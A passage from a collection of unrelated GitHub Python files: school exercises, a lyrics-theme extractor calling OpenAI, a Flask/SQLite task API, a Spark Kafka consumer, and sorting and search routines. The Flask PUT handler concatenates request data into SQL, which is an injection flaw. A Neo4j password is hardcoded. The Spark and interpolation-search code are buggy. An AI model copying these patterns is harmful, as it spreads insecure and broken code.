np.shape(grades)\ntotal_students = grades_len[0]\ntotal_grades = grades_len[1]\n\naverages = [] # liste vide pour stoker les moyennes\n\nfor i in range(0, total_students):\n\n sum_grades = 0\n\n for j in range(0, total_grades):\n sum_grades += grades[i, j]\n\n averages.append(sum_grades / total_grades)\n\n# Calcul de la moyenne\n\nsum_student_avg = 0\n\nfor student_avg in averages:\n sum_student_avg += student_avg\n\nclassroom_avg = sum_student_avg / total_students\n\nprint(f\"Moyenne de la classe: {classroom_avg}\")\n","repo_name":"datalyo-dc-m1/tp-python-Sarah-Datalyo","sub_path":"tp1/td2/exercice_8.py","file_name":"exercice_8.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37348579008","text":"import os\nfrom ast import literal_eval\n\nimport spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nfrom lyricsgenius import Genius\n\nimport openai\n\nfrom neo4j import GraphDatabase\n\nopenai.api_key = os.environ[\"OPENAI_API_KEY\"]\n\nusername = os.environ[\"SPOTIFY_USERNAME\"]\ncid = os.environ[\"SPOTIFY_CID\"]\nsecret = os.environ[\"SPOTIFY_SECRET\"]\ntoken = os.environ[\"GENIUS_TOKEN\"]\n\n\nclient_credentials_manager = SpotifyClientCredentials(\n client_id=cid, client_secret=secret\n)\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n\ngenius = Genius(token)\n\n\ndef get_song_lyrics(g, name):\n search = g.search_song(name)\n\n if search is not None:\n return search.lyrics\n\n\nclass LyricsThemeExtractor:\n def __init__(self):\n self.system_prompt = \"\"\"\"\n Tu es un assistant textuel qui extrait les thèmes en un seul mot correspondants aux paroles d'une chanson mot par mot, les extrayant dans une liste python au format suivant: [\"\", \"\", ...].\n Retourne moi seulement la liste, aucun texte autour sinon c'est invalide.\n Extrait le plus de thèmes possible.\n Essaye de te restreindre aux thèmes suivants: [\"Amitié\", \"Amour\", \"Amusement\", \"Animosité\", \"Argent\", \"Armes\", \"Drogue\", \"Energie\", \"Epreuve\", \"Fantasy\", \"Histoire\", \"Joie\", \"Peine\", \"Religion\", \"Trahison\"] mais tu peux en rajouter si besoin.\n \"\"\"\n\n def get_themes(self, paroles, max_retries=3):\n user_prompt = f'Extrait les themes EN FRANÇAIS SEULEMENT des paroles suivantes en UN SEUL MOT sinon invalide \"{paroles}\"'\n res = None\n retries = 0\n\n while res == None and retries < max_retries:\n try:\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n 
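bs_analytical_solver itself is not included in this excerpt; for reference, the closed-form Black-Scholes put price that the test above exercises can be reproduced with scipy.stats.norm. This is a sketch under the usual no-dividend assumptions, using the test's own inputs, not the author's implementation:

import numpy as np
from scipy.stats import norm

def bs_put(S, K, r, T, sigma):
    # Standard Black-Scholes put: K*exp(-rT)*N(-d2) - S*N(-d1).
    d1 = (np.log(S / K) + (r + 0.5 * sigma**2) * T) / (sigma * np.sqrt(T))
    d2 = d1 - sigma * np.sqrt(T)
    return K * np.exp(-r * T) * norm.cdf(-d2) - S * norm.cdf(-d1)

print(bs_put(S=293.41, K=294.0, r=0.0236, T=4 / 365.0, sigma=0.063361))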
messages=[\n {\"role\": \"system\", \"content\": self.system_prompt},\n {\"role\": \"user\", \"content\": user_prompt},\n ],\n )\n res = literal_eval(completion[\"choices\"][0][\"message\"][\"content\"])\n except:\n retries += 1\n\n return res\n\n\nextractor = LyricsThemeExtractor()\n\ndriver = GraphDatabase.driver(\"bolt://neo4j:7687/\", auth=(\"neo4j\", \"adminadmin\"))\n","repo_name":"ApprocheSemantiqueP2/musicid-docker","sub_path":"streamlit/spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7980488043","text":"import random\nnumber = int(random.randint(0,20))\n#print(number)\nvRound = 0\nvCorect = False\nfor i in range(1,7):\n x = int(input(\"pls enter ur number \"))\n if x == number:\n vCorect = True\n print(\"**********************\")\n print(\"congrat! u guess is right.\")\n print(\"end of game\")\n if vCorect == True:\n break\n else :\n if x < number :\n print(\"lower!, try again\")\n vRound = vRound + 1\n if vRound > 5:\n print(\"**********************\")\n print(\"sry! over than 6times\")\n print(\"end of game\")\n else :\n print(\"greater!, try again\")\n vRound = vRound + 1\n if vRound > 5:\n print(\"**********************\")\n print(\"sry! over than 6times\")\n print(\"end of game\")","repo_name":"ArnonGot/lab_python","sub_path":"guessNumber.py","file_name":"guessNumber.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41261237987","text":"#!/usr/bin/python2\n\nf = open('input.txt')\nreport = {}\nfor line in f.readlines():\n for c in line:\n if not(c in [' ', '\\n', '\\r', '\\t']):\n if c in report:\n report[c] += 1\n else:\n report[c] = 1\nf = open('report.txt', 'w')\nf.write(str(report))\nf.close()\n","repo_name":"nonZero/demos-python","sub_path":"src/exercises/basic/char_report/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27792628385","text":"from flask import Flask, jsonify, request, Response, Blueprint\nfrom flask_cors import CORS\n\nimport sqlite3\nimport datetime\n\nTask_Card_bp = Blueprint('Task_Card', __name__)\n\n# enable CORS\nCORS(Task_Card_bp)\n\n# query 範例:\n# http://127.0.0.1:5001/Task_Card?User_ID=xxx\n@Task_Card_bp.route('/Task_Card', methods=['POST', 'PUT', 'DELETE'])\ndef Task_Card():\n # 表示前端送過來的 Query\n User_ID = request.args.get('User_ID')\n\n con = sqlite3.connect(\"./sql/ProjectMgmt.db\")\n cur = con.cursor()\n ret = cur.execute(\"\"\" SELECT * FROM user WHERE User_ID=? 
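get_themes above retries the completion whenever literal_eval rejects the model's reply. A variant of the same guard that also tolerates replies wrapped in extra prose, by slicing out the first bracketed span before parsing; parse_theme_list is a hypothetical helper, not part of the original script:

from ast import literal_eval

def parse_theme_list(reply):
    # Salvage a Python-style list from a noisy model reply, or return None.
    start, end = reply.find("["), reply.rfind("]")
    if start == -1 or end == -1:
        return None
    try:
        themes = literal_eval(reply[start : end + 1])
    except (ValueError, SyntaxError):
        return None
    return themes if isinstance(themes, list) else None

print(parse_theme_list('Voici la liste: ["Amour", "Trahison"] merci'))  # ['Amour', 'Trahison']
print(parse_theme_list("no list here"))  # None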
\"\"\", (User_ID, ))\n db_result = ret.fetchall()\n con.close()\n\n User_exist = False\n if (len(db_result) != 0):\n User_exist = True\n\n # if User_ID 存在於資料庫\n if (User_exist):\n if request.method == 'POST':\n post_data = request.get_json()\n print(post_data)\n\n Task_Card_ID = post_data.get('Task_Card_ID')\n Task_Card_Name = post_data.get('Task_Card_Name')\n Task_Card_Text = post_data.get('Task_Card_Text')\n Task_Card_StartTime = datetime.date.today()\n Task_Card_EndTime = datetime.date.today()\n Task_Card_Status = True\n Task_List_ID = post_data.get('Task_List_ID')\n\n post_success = False\n\n if(Task_Card_ID and Task_Card_Name and Task_Card_Text and Task_List_ID):\n con = sqlite3.connect(\"./sql/ProjectMgmt.db\")\n cur = con.cursor()\n \n cur.execute(\"\"\"\n INSERT INTO Task_Card VALUES (?, ?, ?, ?, ?, ?, ?)\n \"\"\", (Task_Card_ID, Task_Card_Name, Task_Card_Text, Task_Card_StartTime, Task_Card_EndTime, Task_Card_Status, Task_List_ID))\n\n con.commit()\n\n cur.execute(\"\"\"\n INSERT INTO Task_WorksOn VALUES (?, ?)\n \"\"\", (User_ID, Task_Card_ID))\n\n con.commit()\n \n ret = cur.execute(\"\"\" SELECT * FROM Task_Card WHERE Task_Card_ID=? \"\"\", (Task_Card_ID, ))\n db_result = ret.fetchall()\n\n if (len(db_result) != 0):\n print(\"成功新增任務卡\")\n print(db_result)\n post_success = True\n\n con.close()\n\n # 修改成功\n if(post_success):\n response_object = {\n 'status': 'success',\n 'response': '新增 Task_Card 成功',\n 'method': 'POST',\n 'route': ''\n }\n return jsonify(response_object)\n # 失敗路徑\n else:\n return Response(\n response = \"失敗\",\n status = 400,\n )\n\n elif request.method == 'PUT':\n put_data = request.get_json()\n print(put_data)\n\n Task_Card_ID = put_data.get('Task_Card_ID')\n\n set_str = \"\"\n exe_tuple = ()\n\n for key, value in put_data.items():\n if key != 'Task_Card_ID':\n set_str = set_str + key + \"=?, \"\n exe_tuple = exe_tuple + (value, )\n \n set_str = set_str[:-2]\n exe_str = \"UPDATE Task_Card SET \" + set_str + \"WHERE Task_Card_ID=\" + Task_Card_ID\n \n put_success = False\n con = sqlite3.connect(\"./sql/ProjectMgmt.db\")\n cur = con.cursor()\n cur.execute(exe_str, exe_tuple)\n con.commit()\n con.close()\n put_success = True\n\n if(put_success): \n response_object = {\n 'status': 'success',\n 'response': '修改 Task_Card 成功',\n 'method': 'PUT',\n 'route': ''\n }\n return jsonify(response_object)\n # 失敗路徑\n else:\n return Response(\n response = \"失敗\",\n status = 400,\n )\n\n # http://127.0.0.1:5001/Task_List?User_ID=xxx&Task_Card_ID=xxx\n elif request.method == 'DELETE':\n Task_Card_ID = request.args.get('Task_Card_ID')\n print(Task_Card_ID)\n\n del_success = False\n\n if (Task_Card_ID):\n con = sqlite3.connect(\"./sql/ProjectMgmt.db\")\n cur = con.cursor()\n cur.execute(\"DELETE FROM Task_Card WHERE Task_Card_ID=?\", (Task_Card_ID, ))\n con.commit()\n con.close()\n del_success = True\n\n # 允許刪除\n if(del_success):\n response_object = {\n 'status': 'success',\n 'response': '刪除 Task_Card 成功',\n 'method': 'DELETE',\n 'route': ''\n }\n return jsonify(response_object)\n # 失敗路徑\n else:\n return Response(\n response = \"失敗\",\n status = 400,\n )\n\n else:\n return Response(\n response = \"驗證失敗\",\n status = 400,\n )","repo_name":"ZhiRongDev/ProjectMgmt","sub_path":"server/blueprints/Task_Card.py","file_name":"Task_Card.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19848875465","text":"import sys\n\nfrom pyspark.streaming import StreamingContext\nfrom 
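The PUT branch above assembles its UPDATE statement by string concatenation, which both drops the space before WHERE (set_str[:-2] strips the trailing ", ", leaving "...=?WHERE...") and splices Task_Card_ID straight into the SQL. A parameterized variant that fixes both; this is a sketch using the table and column names from the code above, not a drop-in patch:

import sqlite3

def update_task_card(con, task_card_id, fields):
    # fields: dict of column -> new value, excluding Task_Card_ID.
    # Column names are still interpolated here; in real code they should
    # come from a whitelist, not from request data.
    set_clause = ", ".join(f"{column}=?" for column in fields)
    params = tuple(fields.values()) + (task_card_id,)
    sql = f"UPDATE Task_Card SET {set_clause} WHERE Task_Card_ID=?"
    con.execute(sql, params)
    con.commit()

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE Task_Card (Task_Card_ID TEXT, Task_Card_Name TEXT)")
con.execute("INSERT INTO Task_Card VALUES ('1', 'old')")
update_task_card(con, "1", {"Task_Card_Name": "new"})
print(con.execute("SELECT * FROM Task_Card").fetchall())  # [('1', 'new')]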
pyspark.streaming.kafka import KafkaUtils\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import MapType, ArrayType, FloatType, StringType, StructField, StructType\nfrom collections import defaultdict\nfrom pyspark.sql.functions import from_json, col\nimport time\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Usage: kafka_to_kudu.py \")\n exit(-1)\n\n kuduTableName = \"jira_events\"\n kafkaBrokers, kuduMasters = sys.argv[1:]\n topicSet = [\"jira-event\"]\n\n spark = SparkSession.builder.appName(\"KafkaToKuduPython\").getOrCreate()\n ssc = StreamingContext(spark.sparkContext, 5)\n\n schema = StructType() \\\n .add(\"timestamp\", StringType()) \\\n .add(\"webhookEvent\", StringType()) \\\n .add(\"issue_event_type_name\", StringType()) \\\n .add(\"user\", StructType()\n .add(\"self\", StringType())\n .add(\"accountId\", StringType())\n .add(\"displayName\", StringType())\n .add(\"active\", StringType())\n .add(\"accountType\", StringType())) \\\n .add(\"issue\", StructType()\n .add(\"id\", StringType())\n .add(\"self\", StringType())\n .add(\"key\", StringType())\n .add(\"fields\", MapType(StringType(), StructType()\n .add(\"statuscategorychangedate\", StringType())\n .add(\"issuetype\", MapType(StringType(), StructType()\n .add(\"self\", StringType())\n .add(\"id\", StringType())\n .add(\"description\", StringType())\n .add(\"name\", StringType())\n .add(\"subtask\", StringType())))))\n .add(\"timespent\", StringType())\n .add(\"project\", MapType(StringType(), StructType()\n .add(\"self\", StringType())\n .add(\"id\", StringType())\n .add(\"key\", StringType())\n .add(\"name\", StringType())\n .add(\"projectTypeKey\", StringType())))) \\\n .add(\"fixVersions\", ArrayType(StringType(), True), True) \\\n .add(\"aggregatetimespent\", StringType(), True) \\\n .add(\"resolution\", StringType(), True) \\\n .add(\"resolutiondate\", StringType(), True) \\\n .add(\"created\", StringType())\n\n spark.sparkContext.setLogLevel(\"ERROR\")\n df = spark.readStream.format(\"kafka\").option(\"kafka.bootstrap.servers\", kafkaBrokers).option(\n \"subscribe\", \"jira-event\").option(\"startingOffsets\", \"earliest\").option(\"failOnDataLoss\", \"false\").load()\n\n # query=df.writeStream.outputMode(\"append\").format(\"console\").start()\n # df.show(1)\n df.select('value').show().writeStream \\\n .format(\"console\").outputMode(\"append\").start().awaitTermination()\n\n parsed = df.select(from_json(col(\"value\").cast(\"string\"),\n schema).alias(\"parsed_value\")).writeStream.format(\"console\").outputMode(\"append\").start().awaitTermination()\n\n #result = parsed.writeStream.format(\"console\").outputMode(\"append\").start().awaitTermination()\n parsed.printSchema()\n\n # df.printSchema()\n\n # spark.read.format('org.apache.kudu.spark.kudu').option('kudu.master', kuduMasters)\\\n # .option('kudu.table', kuduTableName).load().registerTempTable(kuduTableName)\n # spark.sql(\"INSERT INTO TABLE {table} from (select uuid(), current_timestamp(), '{payload}')\".format(\n # table=kuduTableName, payload=row.value()))\n\n # query.awaitTermination()\n\n # dstream = KafkaUtils.createDirectStream(\n # ssc, topicSet, {\"metadata.broker.list\": kafkaBrokers})\n # windowedStream = dstream.window(60)\n\n # def debug(x):\n # print(\"{}\".format(x))\n\n # def process(time, rdd):\n # if rdd.isEmpty() == False:\n # collection = rdd.collect()\n # result = list(zip(*collection))[1]\n # a = \"{}\".format(result[0])\n # # print(a)\n # spark.read.json(a).show()\n # # debug(result[0])\n # 
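As written, the chains above call .show() on a streaming DataFrame (unsupported in Structured Streaming, and .show() returns None, so the .writeStream that follows would fail even on a batch frame) and block on awaitTermination() before later statements can run. A minimal corrected shape for inspecting the parsed stream on the console; it assumes schema and kafkaBrokers are defined as in the script above:

from pyspark.sql import SparkSession
from pyspark.sql.functions import col, from_json

spark = SparkSession.builder.appName("KafkaToKuduPython").getOrCreate()

df = (
    spark.readStream.format("kafka")
    .option("kafka.bootstrap.servers", kafkaBrokers)  # assumed defined, as above
    .option("subscribe", "jira-event")
    .option("startingOffsets", "earliest")
    .load()
)
parsed = df.select(from_json(col("value").cast("string"), schema).alias("parsed_value"))
parsed.printSchema()  # schema inspection happens before the query starts

query = parsed.writeStream.format("console").outputMode("append").start()
query.awaitTermination()  # block last, once the query is running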
spark.read.format('org.apache.kudu.spark.kudu').option('kudu.master', kuduMasters)\\\n    #             .option('kudu.table', kuduTableName).load().registerTempTable(kuduTableName)\n\n    #         # str = ''.join(collection[0][1])\n\n    #         # df.show(truncate=False)\n    #         # df.printSchema()\n    #         # df.show()\n    #         spark.sql(\"INSERT INTO TABLE {table} from (select uuid(), current_timestamp(), '{payload}')\".format(\n    #             table=kuduTableName, payload=result[0]))\n\n    # windowedStream.foreachRDD(process)\n\n    # ssc.start()\n    # ssc.awaitTermination()\n","repo_name":"mandocaesar/jira-event-pipeline","sub_path":"spark-consumer.py","file_name":"spark-consumer.py","file_ext":"py","file_size_in_byte":4996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"41713370402","text":"#! /usr/bin/python\nfrom sys import argv\nimport numpy\nimport argparse\nimport matplotlib.pyplot as plt\n\nimport utils\n\ntests = ['hist', 'avg', 'std', 'phase']\n\ndef gen_histogram(vals, filename):\n    plt.hist(vals, bins=256, range = (0,255))\n    plt.savefig(filename+'_hist.png')\n    plt.show()\n\ndef gen_phase_space(vals, filename):\n    phase =[[0 for i in range(256)] for j in range(256)]\n    for i in range(1, len(vals)):\n        phase[vals[i-1]][vals[i]] += 1\n    x = []\n    y = []\n    color = []\n    for i in range(256):\n        for j in range(256):\n            if(phase[i][j] != 0):\n                x.append(i)\n                y.append(j)\n                color.append(phase[i][j])\n    plt.scatter(x,y,c=color)\n    plt.savefig(filename+'_phase.png')\n    plt.show()\n\ndef parse_args(args):\n    parser = argparse.ArgumentParser(description='generate a histogram based on the given file')\n    parser.add_argument('-f', '--file', help='Name of the file to analyze', required=True)\n    parser.add_argument('-t', '--tests', help='Which tests to run.', choices=['all']+tests, nargs='+', required=True)\n    return parser.parse_args(args)\n\nargs = parse_args(argv[1:])\nvals = utils.read_file(args.file)\n\nall_t = False\nif 'all' in args.tests:\n    args.tests = tests\n\nif 'hist' in args.tests:\n    gen_histogram(vals, args.file)\nif 'avg' in args.tests:\n    print('average is:', numpy.mean(vals))\nif 'std' in args.tests:\n    print('standard deviation is:', numpy.std(vals))\nif 'phase' in args.tests:\n    gen_phase_space(vals, args.file)\n","repo_name":"billionai/Chaotic_Cryptography","sub_path":"tests/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"40182555875","text":"# Bubble Sort\r\ndef tukar(data1,i,j):\r\n    data1[i],data1[j] = data1[j],data1[i]\r\ndef bubblesort(data):\r\n    ubah = True\r\n    sesi = len(data)\r\n    while sesi > 1 and ubah:\r\n        ubah = False\r\n        j = 1\r\n        while j < sesi:\r\n            if data[j] < data[j-1]:\r\n                temp = data[j]\r\n                data[j] = data[j-1]\r\n                data[j-1] = temp\r\n                ubah = True\r\n            j += 1\r\n        sesi -= 1\r\nc =[23,7,32,99,4,14,11,20]\r\nprint(\"===========================================\")\r\nprint(\"Before Bubble Sort\")\r\nprint(c)\r\nprint(\"After Bubble Sort\")\r\nbubblesort(c)\r\nprint(c)\r\nprint(\"\")\r\n\r\n\r\n# Selection Sort\r\ndef tukar(data3,i,j):\r\n    data3[i],data3[j] = data3[j],data3[i]\r\ndef Selection(data):\r\n    perubahan = True\r\n    sesi = 0\r\n    while sesi < len(data)-1 and perubahan:\r\n        perubahan = False\r\n        dataterendah = sesi\r\n        datalanjutan = dataterendah + 1\r\n        while datalanjutan < len(data):\r\n            if data[dataterendah] > data[datalanjutan]:\r\n                dataterendah = datalanjutan\r\n            datalanjutan += 1\r\n        if dataterendah != sesi:\r\n            tukar(data,dataterendah,sesi)\r\n            perubahan = True\r\n        print(data)\r\n        if not perubahan:\r\n            
print(\"Final Result = %s\" %str(data))\r\n        sesi += 1\r\nprint(\"===============================================\")\r\nprint(\"Before Selection Sort\")\r\nd = [54,26,13,93,17,77,44,31]\r\nprint(d)\r\nprint(\"After Selection Sort\")\r\nSelection(d)\r\nprint(\"\")\r\n\r\ndef Selectionsort(data4):\r\n    for slot in range(len(data4)-1):\r\n        position = slot\r\n        for location in range(len(data4)-1,slot,-1):\r\n            if data4[location] < data4[position]:\r\n                position = location\r\n        data4[slot],data4[position] = data4[position],data4[slot]\r\n\r\n# Insertion Sort\r\ndef insertionsort(data5):\r\n    for index in range(1, len(data5)):\r\n        x = data5[index]\r\n        y = index - 1\r\n        while y >= 0 and data5[y] > x:\r\n            data5[y + 1] = data5[y]\r\n            y -= 1\r\n        data5[y + 1] = x\r\nprint(\"====================================================\")\r\npanjangList = int(input(\"Enter the desired list length = \"))\r\ndata5 = []\r\nfor i in range(1, panjangList+1):\r\n    angka = int(input(\"Enter number %i for the list = \" %i))\r\n    data5.append(angka)\r\nprint(\"Before Insertion Sort\")\r\nprint(data5)\r\ninsertionsort(data5)\r\nprint(\"After Insertion Sort\")\r\nprint(data5)\r\nprint(\"\")\r\n\r\ndef insertion_sort(data6):\r\n    for i in range(1, len(data6)):\r\n        x = data6[i]\r\n        j = i-1\r\n        while j >= 0 and x < data6[j]:\r\n            data6[j+1] = data6[j]\r\n            j -= 1\r\n        data6[j+1] = x\r\n\r\ng = [12,11,13,5,6]\r\ninsertion_sort(g)\r\nprint(\"===============================================\")\r\nprint(\"Result : \")\r\nfor i in range(len(g)):\r\n    print(\"%d\" %g[i])\r\nprint(\"\")\r\n\r\n# Quick Sort\r\ndef quicksort(alist):\r\n    quickSortHelper(alist,0,len(alist)-1)\r\n\r\ndef quickSortHelper(alist,first,last):\r\n    if first < last:\r\n        splitpoint = partition(alist,first,last)\r\n        quickSortHelper(alist,first,splitpoint-1)\r\n        quickSortHelper(alist,splitpoint+1,last)\r\n\r\ndef partition(alist,first,last):\r\n    pivotvalue = alist[first]\r\n    leftmark = first+1\r\n    rightmark = last\r\n    done = False\r\n    while not done:\r\n        while leftmark <= rightmark and alist[leftmark] <= pivotvalue:\r\n            leftmark = leftmark + 1\r\n        while alist[rightmark] >= pivotvalue and rightmark >= leftmark:\r\n            rightmark = rightmark - 1\r\n        if rightmark < leftmark:\r\n            done = True\r\n        else:\r\n            temp = alist[leftmark]\r\n            alist[leftmark] = alist[rightmark]\r\n            alist[rightmark] = temp\r\n    temp = alist[first]\r\n    alist[first] = alist[rightmark]\r\n    alist[rightmark] = temp\r\n    return rightmark\r\n\r\nalist = [54,26,93,17,77,31,44,55,20]\r\nprint(\"===============================================\")\r\nprint(\"Before Quick Sort\")\r\nprint(alist)\r\nprint(\"After Quick Sort\")\r\nquicksort(alist)\r\nprint(alist)\r\nprint(\"\")\r\n\r\ndef partition(l, bwh, atas):\r\n    pivot = l[bwh]\r\n    pos_batas = bwh+1\r\n    for j in range(bwh+1,atas):\r\n        if l[j] < pivot:\r\n            l[pos_batas],l[j] = l[j],l[pos_batas]\r\n            pos_batas += 1\r\n    l[pos_batas-1],l[bwh] = l[bwh],l[pos_batas-1]\r\n    return pos_batas\r\n\r\ndef quicksort(l, bwh, atas):\r\n    if atas <= bwh:\r\n        return\r\n    q = partition(l, bwh, atas)\r\n    quicksort(l, bwh, q-1)\r\n    quicksort(l, q, atas)\r\n    return l\r\nangka = [34,21,45,32,12,31,19,23,54,31,25,27]\r\nprint(\"===============================================\")\r\nprint('Before Sort:',angka)\r\nquicksort(angka,0,len(angka))\r\nprint('After Sort:',angka)\r\nprint(\"\")\r\n\r\n# Merge Sort\r\ndef merge_sort(list_bilangan):\r\n    jumlah_bilangan = len(list_bilangan)\r\n    if jumlah_bilangan > 1:\r\n        posisi_tengah = len(list_bilangan)//2\r\n        potongan_kiri = list_bilangan[:posisi_tengah]\r\n        potongan_kanan = list_bilangan[posisi_tengah:]\r\n\r\n        merge_sort(potongan_kiri)\r\n        merge_sort(potongan_kanan)\r\n\r\n        jumlah_bilangan_kiri = len(potongan_kiri)\r\n        jumlah_bilangan_kanan = len(potongan_kanan)\r\n        c_all,c_kiri,c_kanan = 0,0,0\r\n        print('Before Merge:',list_bilangan)\r\n        print('Pieces before merge:',potongan_kiri,':',potongan_kanan)\r\n        while c_kiri < jumlah_bilangan_kiri or c_kanan < jumlah_bilangan_kanan:\r\n            if c_kiri == jumlah_bilangan_kiri:\r\n                list_bilangan[c_all] = potongan_kanan[c_kanan]\r\n                c_kanan = c_kanan + 1\r\n            elif c_kanan == jumlah_bilangan_kanan:\r\n                list_bilangan[c_all] = 
potongan_kiri[c_kiri]\r\n                c_kiri = c_kiri + 1\r\n            elif potongan_kiri[c_kiri] <= potongan_kanan[c_kanan]:\r\n                list_bilangan[c_all] = potongan_kiri[c_kiri]\r\n                c_kiri = c_kiri + 1\r\n            else:\r\n                list_bilangan[c_all] = potongan_kanan[c_kanan]\r\n                c_kanan = c_kanan + 1\r\n            c_all = c_all + 1\r\n        print('After Merge:',list_bilangan)\r\n        print()\r\n\r\nangka = [6,5,3,1,8,7,2,4]\r\nprint('Before Sort:',angka)\r\nprint(\"\")\r\nmerge_sort(angka)\r\nprint('After Sort:',angka)\r\nprint(\"\")\r\n\r\n# Radix Sort\r\ndef countingSort(arr, exp1):\r\n    n = len(arr)\r\n    output = [0] * (n)\r\n    count = [0] * (10)\r\n\r\n    for i in range(0, n):\r\n        index = (arr[i] / exp1)\r\n        count[int(index % 10)] += 1\r\n\r\n    for i in range(1, 10):\r\n        count[i] += count[i - 1]\r\n\r\n    i = n - 1\r\n    while i >= 0:\r\n        index = (arr[i] / exp1)\r\n        output[count[int(index % 10)]-1] = arr[i]\r\n        count[int(index % 10)] -= 1\r\n        i -= 1\r\n\r\n    i = 0\r\n    for i in range(0, len(arr)):\r\n        arr[i] = output[i]\r\n\r\ndef radixSort(arr):\r\n    max1 = max(arr)\r\n    exp = 1\r\n    while max1 // exp > 0:\r\n        countingSort(arr, exp)\r\n        exp *= 10\r\narr = [170,45,75,90,802,24,2,66]\r\nradixSort(arr)\r\nfor i in range(len(arr)):\r\n    print(arr[i])\r\nprint(\"\")\r\n\r\n# Sequential Search\r\nData = [10,4,2,3,7,1,6,8]\r\ncaridata = int(input(\"Enter the value to search for:\"))\r\nditemukan = False\r\nfor i in range(0, len(Data)):\r\n    print(Data[i])\r\n    if Data[i] == caridata:\r\n        ditemukan = True\r\n        break\r\nif ditemukan:\r\n    print(\"Data found!!\")\r\nelse:\r\n    print(\"Data not found!!\")\r\nprint(\"\")\r\n\r\n# Linear Search\r\ndef linearSearch(Data,list):\r\n    ditemukan = False\r\n    posisi = 0\r\n    while posisi < len(list) and not ditemukan:\r\n        if list[posisi] == Data:\r\n            ditemukan = True\r\n        posisi = posisi + 1\r\n    return ditemukan\r\ntas = ['Buku','Pensil','Pulpen','Note Book','Laptop','Handphone']\r\nData = input(\"What do you want to look for in the bag? \")\r\ntemukanitem = linearSearch(Data,tas)\r\nif temukanitem:\r\n    print(\"Yes, that item is in the bag\")\r\nelse:\r\n    print(\"Oops, that item is not in the bag\")\r\nprint(\"\")\r\n\r\n# Linear Search with Sentinel\r\nData = [114,110,77,112,65,80,80,90,113,109,110,89,108,85,87,65,90,95,100]\r\ncaridata = 109\r\njumlah = len(Data)\r\nData.append(caridata)\r\nindex = 0\r\nwhile Data[index] != caridata:\r\n    index += 1\r\n\r\nif index < jumlah:\r\n    print('Value',caridata,'found at index',index)\r\nelse:\r\n    print('Value',caridata,'not found')\r\nprint(\"\")\r\n\r\n# Binary Search\r\nData = [1,3,4,6,7,8,10,13,14,18,19,21,24,3,7,40,45,71]\r\ncaridata = 7\r\nprint('Searching for value',caridata,'with Binary Search','in list',Data)\r\nditemukan = False\r\nbatas_awal = 0\r\nbatas_akhir = len(Data) - 1\r\nwhile not ditemukan and batas_awal <= batas_akhir:\r\n    pos_cari = batas_awal + (batas_akhir-batas_awal)//2\r\n    print('Search position: index', pos_cari,'with value',Data[pos_cari])\r\n    if Data[pos_cari] == caridata:\r\n        ditemukan = True\r\n    elif Data[pos_cari] > caridata:\r\n        batas_akhir = pos_cari-1\r\n    else:\r\n        batas_awal = pos_cari+1\r\n\r\nif ditemukan:\r\n    print('Value',caridata,'found at index',pos_cari)\r\nelse:\r\n    print('Value',caridata,'not found')\r\n\r\ndef binarySearch(data, posisi, x, cari):\r\n    if x >= posisi:\r\n        mid = posisi + (x - posisi) // 2\r\n        if data[mid] == cari:\r\n            return mid\r\n\r\n        elif data[mid] > cari:\r\n            return binarySearch(data, posisi, mid-1, cari)\r\n\r\n        else:\r\n            return binarySearch(data, mid+1, x, cari)\r\n    else:\r\n        
return -1\r\n\r\ndata = [2,3,4,10,40]\r\ncari = int(input(\"Enter the data to search for = \"))\r\nresult = binarySearch(data,0,len(data)-1,cari)\r\nif result != -1:\r\n    print(\"Data found!\")\r\nelse:\r\n    print(\"Data not found!\")\r\nprint(\"\")\r\n\r\n# Interpolation Search\r\ndef interpolationSearch(arr, bwh, atas, x):\r\n    if (bwh <= atas and x >= arr[bwh] and x <= arr[atas]):\r\n        pos = bwh + ((atas - bwh) // (arr[atas] - arr[bwh]) *\r\n                     (x - arr[bwh]))\r\n\r\n        if arr[pos] == x:\r\n            return pos\r\n\r\n        if arr[pos] < x:\r\n            return interpolationSearch(arr, pos + 1,\r\n                                       atas, x)\r\n        if arr[pos] > x:\r\n            return interpolationSearch(arr, bwh,\r\n                                       pos - 1, x)\r\n    return -1\r\n\r\narr = [10, 12, 13, 16, 18, 19, 20,\r\n       21, 22, 23, 24, 33, 35, 42, 47]\r\nn = len(arr)\r\n\r\nx = 18\r\nindex = interpolationSearch(arr, 0, n - 1, x)\r\n\r\nif index != -1:\r\n    print(\"Data found at index\", index)\r\nelse:\r\n    print(\"Data not found\")","repo_name":"Shandika14/Kuliah-UTY","sub_path":"Python/Semester - 1/Tugas Bubblesort.py","file_name":"Tugas Bubblesort.py","file_ext":"py","file_size_in_byte":10984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
